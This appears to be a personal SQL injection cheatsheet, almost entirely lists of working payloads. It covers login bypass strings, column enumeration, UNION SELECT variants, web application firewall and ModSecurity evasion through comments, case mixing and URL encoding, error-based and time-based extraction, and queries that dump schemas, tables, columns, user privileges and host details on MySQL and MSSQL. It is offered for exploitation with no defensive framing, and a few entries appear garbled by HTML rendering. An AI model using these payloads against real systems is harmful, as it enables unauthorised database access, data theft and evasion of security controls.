📀SQL Injection Cheatsheet
Below you will find my cheatsheet for exploiting SQL Injection:
----------------------------------------------------------------
SQL injection
Payloads SQL injection login bypass
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or ''-'
" or ""-"
" or true--
' or true--
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
'or 1=1 limit 1 -- -+
'=' 'or'
or '1'='1
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
==
and 1=1--
and 1=1
' or 'one'='one--
' or 'one'='one
' and 'one'='one
' and 'one'='one--
1') and '1'='1--
admin' --
admin' #
admin'/*
or 1=1--
or 1=1#
or 1=1/*
) or '1'='1--
) or ('1'='1--
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'Payloads SQL injection
Detect a SQL error
' = %27
" = %22
# = %23
; = %3BDetect the number of vulnerable columns
ORDER BY 1--
ORDER BY 2--
ORDER BY 3--
ORDER BY 4--
ORDER BY 5--
ORDER BY 6--
ORDER BY 7--
ORDER BY 8--
ORDER BY 9--
ORDER BY 10--
ORDER BY 1#
ORDER BY 2#
ORDER BY 3#
ORDER BY 4#
ORDER BY 5#
ORDER BY 6#
ORDER BY 7#
ORDER BY 8#
ORDER BY 9#
ORDER BY 10#
Union Select Payloads
UNION SELECT 1
UNION SELECT 1,2
UNION SELECT 1,2,3
UNION SELECT 1,2,3,4
UNION SELECT 1,2,3,4,5
UNION SELECT 1,2,3,4,5,6
UNION SELECT 1,2,3,4,5,6,7
1' UNION SELECT 1-- -
1' UNION SELECT 1,2-- -
1' UNION SELECT 1,2,3-- -
1' UNION SELECT 1,2,3,4-- -
1' UNION SELECT 1,2,3,4,5-- -
1' UNION SELECT 1,2,3,4,5,6-- -
1' UNION SELECT 1,2,3,4,5,6,7-- -
1' UNION SELECT NULL-- -
1' UNION SELECT NULL,NULL-- -
1' UNION SELECT NULL,NULL,NULL-- -
1' UNION SELECT NULL,NULL,NULL,NULL-- -
1' UNION SELECT NULL,NULL,NULL,NULL,NULL-- -
1' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -
1' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
UNION ALL SELECT 1
UNION ALL SELECT 1,2
UNION ALL SELECT 1,2,3
UNION ALL SELECT 1,2,3,4
UNION ALL SELECT 1,2,3,4,5
UNION ALL SELECT 1,2,3,4,5,6
UNION ALL SELECT 1,2,3,4,5,6,7
UNION(SELECT 1)
UNION(SELECT 1,2)
UNION(SELECT 1,2,3)
UNION(SELECT 1,2,3,4)
UNION(SELECT 1,2,3,4,5)
UNION(SELECT 1,2,3,4,5,6)
UNION(SELECT 1,2,3,4,5,6,7)
UNION ALL(SELECT 1)
UNION ALL(SELECT 1,2)
UNION ALL(SELECT 1,2,3)
UNION ALL(SELECT 1,2,3,4)
UNION ALL(SELECT 1,2,3,4,5)
UNION ALL(SELECT 1,2,3,4,5,6)
UNION ALL(SELECT 1,2,3,4,5,6,7)
AND 1 UNION SELECT 1
AND 1 UNION SELECT 1,2
AND 1 UNION SELECT 1,2,3
AND 1 UNION SELECT 1,2,3,4
AND 1 UNION SELECT 1,2,3,4,5
AND 1 UNION SELECT 1,2,3,4,5,6
AND 1 UNION SELECT 1,2,3,4,5,6,7
Union Select + sleep() + BENCHMARK(1000000,MD5('A')) Payloads
UNION SELECT @@VERSION,SLEEP(5),3
UNION SELECT @@VERSION,SLEEP(5),USER(),4
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8
techniques to bypass SQL injection
bypass using comments
/*!UNION*/ /*!SELECT*/ 1
/*!UNION*/ /*!SELECT*/ 1,2
/*!UNION*/ /*!SELECT*/ 1,2,3
/*!UNION*/ /*!SELECT*/ 1,2,3,4
/*!UNION*/ /*!SELECT*/ 1,2,3,4,5
/*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6
/*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,7
/*!12345UNION*/ /*!12345SELECT*/ 1
/*!12345UNION*/ /*!12345SELECT*/ 1,2
/*!12345UNION*/ /*!12345SELECT*/ 1,2,3
/*!12345UNION*/ /*!12345SELECT*/ 1,2,3,4
/*!12345UNION*/ /*!12345SELECT*/ 1,2,3,4,5
/*!12345UNION*/ /*!12345SELECT*/ 1,2,3,4,5,6
/*!12345UNION*/ /*!12345SELECT*/ 1,2,3,4,5,6,7
/*!12345UNION*/(/*!12345SELECT*/ 1)
/*!12345UNION*/(/*!12345SELECT*/ 1,2)
/*!12345UNION*/(/*!12345SELECT*/ 1,2,3)
/*!12345UNION*/(/*!12345SELECT*/ 1,2,3,4)
/*!12345UNION*/(/*!12345SELECT*/ 1,2,3,4,5)
/*!12345UNION*/(/*!12345SELECT*/ 1,2,3,4,5,6)
/*!12345UNION*/(/*!12345SELECT*/ 1,2,3,4,5,6,7)
bypass using comments + url encoding
/*!%55nion*/%20/*!%53elect*/1
/*!%55nion*/%20/*!%53elect*/%201,2
/*!%55nion*/%20/*!%53elect*/%201,2,3
/*!%55nion*/%20/*!%53elect*/%201,2,3,4
/*!%55nion*/%20/*!%53elect*/%201,2,3,4,5
/*!%55nion*/%20/*!%53elect*/%201,2,3,4,5,6
/*!%55nion*/%20/*!%53elect*/%201,2,3,4,5,6,7
/*!12345%55nion*/ /*!12345%53elect*/ 1
/*!12345%55nion*/ /*!12345%53elect*/ 1,2
/*!1234%55nion*/ /*!12345%53elect*/ 1,2,3
/*!12345%55nion*/ /*!12345%53elect*/ 1,2,3,4
/*!12345%55nion*/ /*!12345%53elect*/ 1,2,3,4,5
/*!12345%55nion*/ /*!12345%53elect*/ 1,2,3,4,5,6
/*!12345%55nion*/ /*!12345%53elect*/ 1,2,3,4,5,6,7
/*!12345%55nion*/(/*!12345%53elect*/ 1)
/*!12345%55nion*/(/*!12345%53elect*/ 1,2)
/*!12345%55nion*/(/*!12345%53elect*/ 1,2,3)
/*!12345%55nion*/(/*!12345%53elect*/ 1,2,3,4)
/*!12345%55nion*/(/*!12345%53elect*/ 1,2,3,4,5)
/*!12345%55nion*/(/*!12345%53elect*/ 1,2,3,4,5,6)
/*!12345%55nion*/(/*!12345%53elect*/ 1,2,3,4,5,6,7)
Information_schema.tables
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
/*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex tableOrder by
/**/ORDER/**/BY/**/
/*!order*/+/*!by*/
/*!ORDER BY*/
/*!50000ORDER BY*/
/*!50000ORDER*//**//*!50000BY*/
/*!12345ORDER*/+/*!BY*/Concat
CoNcAt()
concat()
CON%08CAT()
CoNcAt()
%0AcOnCat()
/**//*!12345cOnCat*/
/*!50000cOnCat*/(/*!*/)
unhex(hex(concat(table_name)))
unhex(hex(/*!12345concat*/(table_name)))
unhex(hex(/*!50000concat*/(table_name)))group_concat
/*!group_concat*/()
gRoUp_cOnCAt()
group_concat(/*!*/)
group_concat(/*!12345table_name*/)
group_concat(/*!50000table_name*/)
/*!group_concat*/(/*!12345table_name*/)
/*!group_concat*/(/*!50000table_name*/)
/*!12345group_concat*/(/*!12345table_name*/)
/*!50000group_concat*/(/*!50000table_name*/)
/*!GrOuP_ConCaT*/()
/*!12345GroUP_ConCat*/()
/*!50000gRouP_cOnCaT*/()
/*!50000Gr%6fuP_c%6fnCAT*/()
unhex(hex(group_concat(table_name)))
unhex(hex(/*!group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(table_name)))
unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
unhex(hex(/*!50000group_concat*/(table_name)))
unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
convert(group_concat(table_name)+using+ascii)
convert(group_concat(/*!table_name*/)+using+ascii)
convert(group_concat(/*!12345table_name*/)+using+ascii)
convert(group_concat(/*!50000table_name*/)+using+ascii)
CONVERT(group_concat(table_name)+USING+latin1)
CONVERT(group_concat(table_name)+USING+latin2)
CONVERT(group_concat(table_name)+USING+latin3)
CONVERT(group_concat(table_name)+USING+latin4)
CONVERT(group_concat(table_name)+USING+latin5)
Union Select
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+ #?uNiOn + #?sEleCt
+ #?1q %0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+
HTML URL Encode (URL encoding)
union select:
u = %75
n = %6e
i = %69
o = %6f
n = %6e
space = %20
s = %73
e = %65
l = %6c
c = %63
t = %74
SQL payloads
/**8**/and/**8**/0/**8**//*!50000union*//**8**//*!50000select*//**8**/+ numero de columnas +--+
+/*!50000%55nIoN*/+/*!50000%53eLeCt*/+
SELECT * FROM (SELECT count(*), CONCAT((SELECT database()), 0x23, FLOOR(RAND(0)*2)) AS x FROM information_schema.columns GROUP BY x) y --
+uNiOn+(/*!/**/SeleCT*/+1,22,333...)+--+
%55%6e%49%6f%4e(/*!/**/%20SeleCT%20*/%2011,22,33,44,55,66,77,88,90,1010,1111,1212,1313,1414,1515,1616,1717,1818,1919....)
+/*✓*/UnIoN/*✓*/+/*✓*/AlL/*✓*/+(SeLeCt+1,2,3,%27soy%20vulnerable%27,5,6.....)+--+
+div+@a:=(current_user/**_**/())+UNION/**/DISTINCTROW+SELECT+1,2,@a,4+--+
%75nion/**)!*/sele%63%74/**)!*/+1,2,3....
/*!50000%75%6e%69on*/ %73%65%6cect 1,2,3,4,5--
+union(select+1,2,3,4,concat(column_name),6,...+from+information_schema.columns+where+table_name=%22columna%22+limit+1,1)+--+
+union(select+1,2,3,database(),concat(hash,0x3a,hash),6..+from(columna))+--+
SQL injections using SQL functions
SQL injection payload using RPAD function and SOUNDS LIKE
SELECT RPAD(table_name,50,'.') from information_schema.tables where table_schema sounds like database()
SQL injection payload using upper + reverse + right + sounds like to extract information
select upper(reverse(right(reverse(table_name),100)))from information_schema.tables where table_schema sounds like database()
SQL injection using the double Reverse, hex, and unhex
Select unhex(hex(reverse(reverse(elt(1, table_Name))))) from information_schema.tables
SQL injection case
SELECT CASE WHEN (1=1) THEN table_name ELSE '<a href=https://twitter.com/_Y000_>_Y00!_</a>' END from information_schema.tables
SELECT CASE 4 WHEN 1 THEN database() WHEN 2 THEN @@version WHEN 3 THEN table_name ELSE '_Y000!_' END FROM information_schema.tables
SELECT CASE WHEN 1>0 THEN table_name ELSE '_Y000!_' END FROM information_schema.tablesSQL injection case and sounds like
CASE table_type WHEN 'BASE Table' THEN table_name END from information_Schema.tables where table_schema sounds like schema()
SQL IF Function
SELECT IF(STRCMP('1','1'),'_Y000!_',table_name) FROM information_schema.tables
select IF(MID(@@version,1,1)='5',table_name,'_Y000!_') from information_schema.tablesSQL IF NULL
SELECT IFNULL(1+1/0,table_name) FROM information_schema.tablesSQL NULL IF
SELECT NULLIF(table_name,2) from information_schema.tablesSQL injection payload using upper + reverse + right + sounds like
select upper(reverse(right(reverse(table_name),100)))from information_schema.tables where table_schema sounds like database()
SQL injection using double reverse + right + if statement + HTML injection
SELECT reverse(reverse(right(if(1=1,table_name,'<h3><font color=blue> Tablas:</h3>'),100))) from information_schema.tables
SQL injection using HEX-UNHEX functions
SELECT UNHEX(HEX(table_name))from information_schema.tables
SQL injection type error based using Extract value
1%20and+extractvalue(rand(),concat(0x7e,version(),0x7e,user()))--
SQL injection payload using reverse
reverse(right(reverse(data),1))
SQL injection payload using extractvalue
extractvalue(rand(),concat(CHAR(126),database(),CHAR(126)))
SQL injection payload + url encode + timing
-7 %23%0AAND 0--%0A /*!12345UNION*/ /*!12345ALL*/ (/*!12345SELECT*/ 1,sleep(5),'soy vulnerable',BENCHMARK(1000000,MD5('true')),5,6,7,8,9,10,11,12,13)
JSON Generation Functions
select JSON_OBJECT(1, @@version)
select json_array(current_user())
select json_objectagg(1, @@datadir)
select json_arrayagg('_Y000!_')
Mixtures
select json_arrayagg(concat(JSON_OBJECT(concat(JSON_OBJECT(concat(current_user()), concat(@@version))), '_Y000!_')))
SELECT * FROM information_schema.tables WHERE `table_name` REGEXP 'admin'
SELECT IF(IFNULL(1/0,'a'),'NO',JSON_OBJECT(1, concat(table_name))) FROM information_schema.tables WHERE `table_name` REGEXP 'admin'
select UPDATEXML(1,CONCAT('.',1,(SELECT (ELT(1=1,2))),3),1)
select UNHEX(HEX(lpad(table_name,50,'>'))) from information_schema.tables
SELECT TRIM(UpdateXML(table_name, '_Y000_', '1111')) FROM information_schema.tables
select IF(IFNULL(0,'a'),'NO es nulo',JSON_OBJECT(1, concat(table_name))) FROM information_schema.tables
Select if(substring(@@version,'1','1') = "5", 'si', 'no')
Select Unhex(hex(WEIGHT_STRING(table_name))) as 'tables' from information_schema.tables where table_name regexp '^[a | b]'
select UNHEX(HEX(lpad(table_name,50,'>'))) from information_schema.tables
select UPDATEXML(1,CONCAT('.',1,(SELECT (ELT(1=1,2))),3),1)
SELECT TRIM(UpdateXML(table_name, '_Y000_', '1111')) FROM information_schema.tables
SELECT version() FROM (SELECT(SLEEP(5))) a
SELECT * FROM(SELECT COUNT(*),CONCAT(database(),'--',(SELECT (ELT(1=1,version()))),'--','_Y000!_',FLOOR(RAND(1)*1))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x) a
SELECT TRIM(UpdateXML(CONCAT('.',database(),'--',(SELECT (ELT(1=1,@@version))),concat('--',@@datadir)), '_Y000_', '1111'))
SELECT * FROM (SELECT count(*), CONCAT((select json_arrayagg(concat(JSON_OBJECT(concat(JSON_OBJECT(concat(current_user()), concat(@@version))), '_Y000!_')))), 0x23, FLOOR(RAND(0)*1)) AS x FROM information_schema.columns GROUP BY x) y
Select if(now()=sysdate(),(select table_name),0) from information_schema.tables
select json_arrayagg(concat(JSON_OBJECT(concat(JSON_OBJECT(concat(current_user()), concat(@@version))), '_Y000!_')))
SELECT 0 FROM (SELECT count(*), CONCAT((SELECT @@version), 0x23, FLOOR(RAND(0)*4)) AS Y000 FROM information_schema.tables GROUP BY Y000) x
SQL injection + sql god
/*!u%6eion*/ /*!se%6cect*/+1,concat(@:=0,(select count(*)from information_schema.columns where@:=concat(@,'<br>',table_name,'::',column_name)),@),3..
(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)
CONCAT(Tablas <br>,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=information_schema)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,2,0x30),0x3a20,table_name,0x3c62723e))))x))SQL injection Buffer Overflow / Firewall Crash bypass + xss injection
+and+(select%201)=(Select%200xaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa....)+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4,....+--+
SQL injection payload+ bypass Mod_Security
/*!50000un0x696fn*/+/*!12345AlL*/(/*!50000se0x6c65ct*/+1)+--+
/*!50000%75%6e%69on*/ %73%65%6cect 1,2,3,4...
/*!12345UnioN*//**/(/*!12345seLECT*//**/1)+--
/*!12345#qa%0A#%0AUnIOn*/(/*!12345#qa%0A#%0ASeleCt*//**/1)+--+
/*!50000and*/ /*!50000extractvalue*/(0x0a,/*!50000concat(0x0a,(select JSON_OBJECT(1, current_user())))*/)
%27+or%20.0union/**/distinctrow%23GearFourth%0aselect/**/distinctrow%20
Sql injection payload + god + Mod_Security bypass
/*!50000%75%6e%69on*/ %73%65%6cect 1,cOncAT/**x**/(0b0010001000111110001011110011111000111100001011110110000100111110001011010010110100111110001111000110001001110010001111100011110001100010011100100011111000111100011100110111010001111001011011000110010100111110011101000111001000111010011011100111010001101000001011010110001101101000011010010110110001100100001010000110010101110110011001010110111000101001001000000111101100100000011000100110000101100011011010110110011101110010011011110111010101101110011001000010110101100011011011110110110001101111011100100011101000100000001000110110011000110010011001100011001001100110001100100011101101111101011101000110000101100010011011000110010101111011011101110110100101100100011101000110100000111010001101010011000001110000011110000011101101101111011101100110010101110010011001100110110001101111011101110011101001100001011101010111010001101111001110110111110100111100001011110111001101110100011110010110110001100101001111100011110001110100011000010110001001101100011001010011111000111100011000100011111001001101011011110110010001011111011100110110010101100011011101010111001001101001011101000111100100100000011000100111100101110000011000010111001101110011001000000110001001111001001000000100110001110101011010010111001100100000010011010110000101100100011001010111001001101111001000000010100001011111010110010011000000110000001100000010000101011111001010010011110000101111011000100011111000111100011000100111001000111110,user/**x**/(),0b00111100011000100111001000111110,dAtAbaSe/**x**/(),0b00111100011000100111001000111110,version/**x**/(),0b001111000110001001110010001111100011110001100010011100100011111000111100011101000111001000111110001111000111010001101000001111100101010001000001010000100100110001000101010100110011110000101111011101000110100000111110001111000111010001101000001111100100001101001111010011000101010101001101010011100101001100111100001011110111010001101000001111100011110000101111011101000111001000111110,(select(@x)/*!50000from/**8**/*/(/*!50000select/**8**/*/(@x:=0b00000000),(select(0)/*!From/**8**/*/(/*!50000information_schema.columns/**8**/*/)/*!50000where/**8**/*/(table_schema=database/**_**/())and(0b00000000)in(@x:=/*!50000coNcat/**8**/*/(@x,0b001111000111010001110010001111100011110001110100011001000011111000111100011001100110111101101110011101000010000001100011011011110110110001101111011100100011110101110010011001010110010000111110,/*!50000table_name/**8**/*/,0b00111100001011110110011001101111011011100111010000111110001111000010111101110100011001000011111000111100011101000110010000111110,/*!50000column_name/**8**/*/))))x)),3.4
Sql injection payload + comment + hex/unhex
/*!50000select*/unhex(hex(/*!12345concat*/(0x223e,version(),0x223e,database())))
SQL databases and tables
/*!50000COnCaT/**8**/*/(0x3c68313e5f59303030215f3c2f68313e,0x3c703e56657273696f6e3a203c2f703e,@@version,0x3c62723e,0x3c703e486f73746e616d653a203c2f703e,@@hostname,0x3c62723e,0x3c703e446174616261736573203a203c2f703e,(select%20grouP_ConCat(/*!50000schema_name/**8**/*/,0x3c62723e)+/*!50000fRom/**8**/*/+/*!50000iNfoRmAtiOn_sChEmA/**_**/.ScHeMaTa*/),0x3c62723e,0x3c703e5461626c6573203a203c2f703e,(select%20grouP_ConCat(/*!50000table_name/**8**/*/,0x3c62723e)+/*!50000fRom/**8**/*/+/*!50000iNfoRmAtiOn_sChEmA/**_**/.TabLes*/))
concat(0x3c68313e5f59303030215f3c2f68313e,0x3c703e56657273696f6e3a203c2f703e,@@version,0x3c62723e,0x3c703e486f73746e616d653a203c2f703e,@@hostname,0x3c62723e,0x3c703e446174616261736573203a203c2f703e,(select%20grouP_ConCat(/*!50000schema_name/**8**/*/,0x3c62723e)+/*!50000fRom/**8**/*/+/*!50000iNfoRmAtiOn_sChEmA/**_**/.ScHeMaTa*/),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x))
concat(0x3c68313e5f59303030215f3c2f68313e,0x3c703e56657273696f6e3a203c2f703e,@@version,0x3c62723e,0x3c703e486f73746e616d653a203c2f703e,@@hostname,0x3c62723e,0x3c62723e,0x3c613e50726976696c6567696f733a203c2f613e,0x3c62723e,(SELECT+GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTABLE,0x3c62723e)+FROM+INFORMATION_SCHEMA.USER_PRIVILEGES),0x3c62723e,0x3c703e446174616261736573203a203c2f703e,(select grouP_ConCat(/*!50000schema_name/**8**/*/,0x3c62723e)+/*!50000fRom/**8**/*/+/*!50000iNfoRmAtiOn_sChEmA/**_**/.ScHeMaTa*/),0x3c62723e,0x3c613e5461626c61733a203c2f613e,0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x))SQL injection payload + URL encode
+/*!12120%55%6e%49%6f%4e*/+(%53%65%4c%65%43%74+111,222,333,database(),555,...)+--+
MSSQL
-- : Comment Type 1
--+ : Comment Type 2
--+- : SQL Comment
/**/ : Inline Comment
;%00 : Null Byte
@@version : Current Version
user_name() : Current User
user : Current User
db_name() : Current Database
@@SERVERNAME : Hostname
Tables
union select table_name from (select top 1 table_name from information_schema.tables order by 1) as 1 order by 1 desc--
Columns
union select column_name from (select top 1 column_name from information_schema.columns where table_name='table' order by 1) as 1 order by 1 desc--
Dump info
union select column form table--
Xpath injection
+and extractvalue(0x0a,concat(0x0a,(select version())))
+and updatexml(null,concat(0x0a,(select version())),null)
+and extractvalue(0x0a,concat(0x0a,(select database())))
+and updatexml(null,concat(0x0a,(select database())),null)
+and extractvalue(0x0a,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)))
+and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),null)
+and extractvalue(0x0a,concat(0x0a,(select column_name from information_schema.columns where table_schema=database() and table_name=0x6e6f6d627265 limit 0,1)))
+and updatexml(null,concat(0x0a,(select column_name from information_schema.columns where table_schema=database() and table_name=0x6e6f6d627265 limit 0,1)),null)
+and extractvalue(0x0a,concat(0x0a,(select concat(columna) from tabla limit 0,1)))
+and updatexml(null,concat(0x0a,(select concat(columna) from tabla limit 0,1)),null)
Error based
Version:
+OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1
Database():
+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
Tablas:
+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=0x7461626c65+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
Columns:
+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x636f6c756d6e61+AND+table_schema=0x7461626c65+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
Extraer información:
+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(columna+AS+CHAR),0x7e))+FROM+table+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
Ai test waf bypass
uNion%20sElECt%20%2F*%21%20dAtaBaSE()%20*%2F%2b--%2b
Personal
